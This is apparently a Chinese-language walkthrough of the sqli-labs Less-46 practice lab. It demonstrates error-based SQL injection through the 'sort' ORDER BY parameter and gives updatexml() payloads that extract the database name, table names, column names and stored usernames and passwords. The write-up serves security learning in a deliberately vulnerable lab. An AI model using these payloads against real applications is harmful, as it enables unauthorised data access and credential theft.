sqli-labs/Less-46

从欢迎界面可以得知他要我们将sort作为参数值输入到url中去

首先我们再注入之前先来学点有用的知识

如果注入类型属于数字型的话那么每次提交rand()参数界面都会不一样 可如果是字符型的话 那么界面就不会变

这一关恰好使用了这么一个知识点

我们来试一试吧 输入如下

sort=rand()

接连尝试几次 都发生了改变 所以注入类型属于数字型

这一关我们利用报错注入吧

首先爆库 输入如下

sort=updatexml(1,if(1=1,concat(0x7e,database(),0x7e),1),1)

嘿嘿 成功爆破 回显如下

接着进行爆表操作 输入如下

sort=updatexml(1,concat(0x7e,(if(1=1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1)),0x7e),1)

 回显如下

接着进行爆字段操作 输入如下

sort=updatexml(1,if(1=1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1),1)

 

最后进行爆用户名和密码操作 输入如下

sort=updatexml(1,if(1=1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1),1)

 回显如下

 成功解题 嗨嗨！！